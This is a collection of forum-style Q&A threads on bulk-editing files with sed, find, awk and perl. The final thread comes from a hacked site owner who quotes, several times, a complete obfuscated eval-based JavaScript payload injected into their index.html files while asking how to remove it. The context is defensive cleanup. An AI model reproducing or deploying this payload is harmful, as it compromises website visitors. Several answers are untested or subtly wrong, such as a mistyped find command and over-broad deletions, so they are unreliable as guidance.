Remove line feed(s) from start of specific files - linux

I need to remove any occurrences of line feeds (carriage returns on a mac) from the very start of all files with the .php or .html extension. There are no other characters between the line feeds like spaces or anything.
So for example (using /lf as an example of line feed):
<!doctype html>
<!doctype html>
should be reduced down to:
<!doctype html>
One way of removing line feeds I've found is:
tr -d '\012'
But I have no idea how to target this at specific files, let alone only the first few lines.
So I've got the following:
find . \( -name "*.php" -or -name "*.html" \) | xargs grep -l "\012" | xargs sed -i -e "s/\012//g"
But this won't target only the first few lines, and I'm not entirely sure if it correctly targets line feeds either.
So, anyone got any bright ideas?

sed -i '/./,$\!d' filename
or even from find:
find . \( -name "*.php" -or -name "*.html" \) -exec sed -i '/./,$\!d' {} \;
The \ before the !d may not be needed, in my shell I need to escape it because csh keeps thinking I'm referring to a previous event via the ! symbol.
So the /./,$\!d, bit, it looks like gibberish but this is what's happening.
There are 2 addresses being defined here, the first is the regex . which is anything that isn't a blank line. Thus the first address is the first non-blank line matched by /./.
Then we have the second address, separated by the ,, and it's simply $, the end of the file. So the region we've defined by our 2 addresses is the first non-blank line all the way to the end of the file.
We're going to use sed's delete function here, which is denoted by the last d in the script. However, by using d, we'd be deleting everything starting from the first non-blank line to the end of the file.
Lastly, because we'd be deleting the very thing that we want, we use a ! right in front of the d command to tell sed, "ok, do exactly the opposite of what I'm telling you to do instead". Thus, instead of deleting everything starting from the first non-blank line to the end of the file, we're doing the complete opposite, preserving the first non-blank line to the end of the file, which has the effect of deleting all of the blank lines at the beginning of the file.
There's probably some way to do this using the p (print) command, which is sort of like the opposite of delete, but doesn't really behave that way. I'm sure there's some way to do this using p or !p.

Perl is good for this type of processing if you have that installed. You could do a little "do .. until" loop that exits once it finds a line with non-whitespace characters. Off the top of my head:
do {
} until ( /^\S/ );
(But verify those regular expressions do what you want them to first!)

find /path/to/root/directory -type f -exec tr -d '\012' {} \;
where /path/to/root/directory is the top-level path where looked for all files to remove all occurrences.

If you know that the Linefeeds are only in the first, say, 10 lines, then you can change the SED command so that it only operates on the first ten lines. That's the 1,10 below.
xargs sed -i -e "1,10s/\012//g"


Replace spaces in all files in a directory with underscores

I have found some similar questions here but not this specific one and I do not want to break all my files. I have a list of files and I simply need to replace all spaces with underscores. I know this is a sed command but I am not sure how to generically apply this to every file.
I do not want to rename the files, just modify them in place.
Edit: To clarify, just in case it's not clear, I only want to replace whitespace within the files, file names should not be changed.
find . -type f -exec sed -i -e 's/ /_/g' {} \;
find grabs all items in the directory (and subdirectories) that are files, and passes those filenames as arguments to the sed command using the {} \; notation. The sed command it appears you already understand.
if you only want to search the current directory, and ignore subdirectories, you can use
find . -maxdepth 1 -type f -exec sed -i -e 's/ /_/g' {} \;
This is a 2 part problem. Step 1 is providing the proper sed command, 2 is providing the proper command to replace all files in a given directory.
Substitution in sed commands follows the form s/ItemToReplace/ItemToReplaceWith/pattern, where s stands for the substitution and pattern stands for how the operation should take place. According to this super user post, in order to match whitespace characters you must use either \s or [[:space:]] in your sed command. The difference being the later is for POSIX compliance. Lastly you need to specify a global operation which is simply /g at the end. This simply replaces all spaces in a file with underscores.
Substitution in sed commands follows the form s/ItemToReplace/ItemToReplaceWith/pattern, where s stands for the substitution and pattern stands for how the operation should take place. According to this super user post, in order to match whitespace characters you must use either just a space in your sed command, \s, or [[:space:]]. The difference being the last 2 are for whitespace catching (tabs and spaces), with the last needed for POSIX compliance. Lastly you need to specify a global operation which is simply /g at the end.
Therefore, your sed command is
sed s/ /_/g FileNameHere
However this only accomplishes half of your task. You also need to be able to do this for every file within a directory. Unfortunately, wildcards won't save us in the sed command, as * > * would be ambiguous. Your only solution is to iterate through each file and overwrite them individually. For loops by default should come equipped with file iteration syntax, and when used with wildcards expands out to all files in a directory. However sed's used in this manner appear to completely lose output when redirecting to a file. To correct this, you must specify sed with the -i flag so it will edit its files. Whatever item you pass after the -i flag will be used to create a backup of the old files. If no extension is passed (-i '' for instance), no backup will be created.
Therefore the final command should simply be
for i in *;do sed -i '' 's/ /_/g' $i;done
Which looks for all files in your current directory and echos the sed output to all files (Directories do get listed but no action occurs with them).
Well... since I was trying to get something running I found a method that worked for me:
for file in `ls`; do sed -i 's/ /_/g' $file; done

remove DOS end of file character from many files in Linux

I transferred millions of generated SVG files from DOS to a Linux box and just realized that there is a ^# as the last character of each file (the DOS end of file character) which is giving an error when I try to display the SVG file in a browser.
In this question:
How can I remove the last character of the last line of a file?
Maroun gives the solution as:
sed '$ s/.$//' your_file
But when I modify it to look like this:
sed '$ s/.$//' *.SVG
find . -print | grep .SVG | sed '$ s/.$//'
It does not work.
I would also like to be able to specify that it should only delete the last character if it is the ^#.
Can someone please tell me what I am doing wrong or how to get this to work. The SVG files are in thousands of sub directories so I need to be able to make the change from top to bottom of the tree structure.
I'm guessing your first example isn't working because it's taking only the last file expanded by *.SVG. The second example (the one with the find command) fails because you're passing find's output to sed instead of the file contents.
Also, if you want to change the files' contents with sed, you need to use -i so the changes are performed "in place".
You could try this:
for file in *.SVG
sed -i '$ s/.$//' $file
find . -name "*.SVG" -exec sed -i '$ s/.$//' {} \;

sed for a string in only 1 line

What I want to do here is locate any file that contains a specific string in a specific line, and remove said line, not just the string.
What I have is something along the lines of this:
find / -type f -name '*.foo' -exec sed '1/stringtodetect/d' {} \;
However this will remove everything BETWEEN line 1 and the string. given that sed argument. (sed '1,/stringtodetect/d' "$file")
Lets say I have a .php file, and I'm looking for the string 'gotcha'.
I only want to edit the file if it has the string in the FIRST line of the file, like so:
gotcha with this.
useful text
more text
dont delete me
If I ran the script, I'd want the contents of the same file to appear as such:
List item
List item
dont delete me
Any tips?
You are using the following range address for the delete command:
This means all lines from line 1 until the first occurrence of stringtodelete.
Furthermore, you need not (and should not!) iterate over the results from find. find has the -exec option for that. It executes a command for each file which has been found, passing the filename as an argument.
It should be:
find / -type f -name '*.foo' -exec sed '/stringtodetect/d' {} \;
Test the command first. Once you are sure it works, use sed -i to modify the files in place. If you want a backup you can use sed -i.backup (for example). To remove the backups once you are sure you can use find again:
find / -type -name '*.foo.backup' -delete
You need a sed script that will skip any line by number that is not the one you are interested in, and only for the line you are interested in delete the line if it matches.
sed -e1bt -eb -e:t -e/string/d < $file
-e1bt = for line 1, branch to label "t"
-eb = branch unconditionally to the end of the script (at which point it will print the line).
-e:t = define label "t"
-e/string/d = delete the line if it contains "string" - this instruction will only be reached if the unconditional branch to the end of the script was NOT taken, i.e. if the line number branch WAS taken.
Could it be that it is matching parts of a string.
If you try exact match, it might help.
Also, remove the 1, at the beginning or replace it with 0,
sed '/<stringtodetect>/d' "$file";
sed is for simple substitutions on individual lines, that is all. For anything else just use awk for simplicity, clarity, robustness, portability and all of the other desirable attributes of software:
awk '!(NR==1 && /stringtodetect/)' file
You were close. I think what you're looking for is: sed '1{/gotcha/d;}'

How to remove multiple lines in multiple files on Linux using bash

I am trying to remove 2 lines from all my Javascript files on my Linux shared hosting. I wanted to do this without writing a script as I know this should be possible with sed. My current attempt looks like this:
find . -name "*.js" | xargs sed -i ";var
The second line is actually longer than this but is malicious code so I have not included it here. As you guessed my server has been hacked so I need to clean up all these JavaScript files.
I forgot to mention that the output I am getting at the moment is:
sed: -e expression #1, char 4: expected newer version of sed
The 2 lines are just as follows consecutively:
except that the second line is longer, but the rest of the second line should not influence the command.
He meant removing two adjacent lines.
you can do something like this, remember to backup your files.
find . -name "*.js" | xargs sed -i -e "/^;var/N;/^;var\nO0l='=sTKpUG/d"
Since sed processes input file line by line, it does not store the newline '\n' character in its buffer, so we need to tell it by using flag /N to append the next line, with newline character.
Then we do our pattern searching and deleting.
It really isn't clear yet what the two lines look like, and it isn't clear if they are adjacent to each other in the JavaScript, so we'll assume not. However, the answer is likely to be:
find . -name "*.js" |
xargs sed -i -e '/^distinctive-pattern1$/d' -e '/^alternative-pattern-2a$/d'
There are other ways of writing the sed script using a single command string; I prefer to use separate arguments for separate operations (it makes the script clearer).
Clearly, if you need to keep some of the information on one of the lines, you can use a search pattern adjusted as appropriate, and then do a substitute s/short-pattern// instead of d to remove the short section that must be removed. Similarly with the long line if that's relevant.

Escape characters in shell

First off, I need to give a disclaimer:
It is code that has been injected in to some of my sites by someone unscrupulous. I need to find and replace it (with either a space or nothing). It has specifically targeted index.html and index.htm files with the exact same code in all of them.
The JavaScript is the following (again, don't run it).
<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;587!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>
I need to find and replace this via a unix-like command line (I don't want to have to go through every file manually).
I have tried the following:
sed -i "s/<script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:\"\");for(;587!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>/ /g" *.html
Escaping all the double quotes, but this still throws the error:
sed: -e expression #1, char 2075: unknown option to `s'
However, I know that the s option does work, as I have previously used this to find and replace some PHP.
I have also tried the following, but to no effect either (throws the same error):
find . \( -name "*.html" -or -name "*.htm" \) | xargs grep -l "<script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:\"\");for(;587!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>" | xargs sed -i -e "s/<script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:\"\");for(;587!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>/ /g"
What is causing this error, and how can I fix it?
I am at a loss as to what is causing that error, so any help is greatly appreciated.
The problem is that you're not escaping the special characters in the text, such as the / delimiter.
The easiest solution is to pick a different delimiter and to specify only a part of the string, for instance
find . -name '*.html' -o -name '*.htm' |
xargs fgrep -l '<script>i=0;try' |
xargs perl -i.infected -pe 's#<script>i=0;try.*?</script>##g'
(untested) may do the job.
(The .*? construct picks the shortest match; I don't know how to do that in sed.)
Verify with something like
find . -name '*.infected' | sed -e 's#.*#diff & &#' -e 's#.infected##' | sh -x
The sed error came from the fact that the syntax for search and replace is:
But in your text a / appears, so the get the parts test, replace and options wrong.
There is an easy solution. sed does not need to use the / as the delimiter between the argumens. You can use any char you want. Just pick one not appearing in your text, e.g # or % (the first delimiter (the one after the intial s) is the delimiter he expects in the rest of the command)..
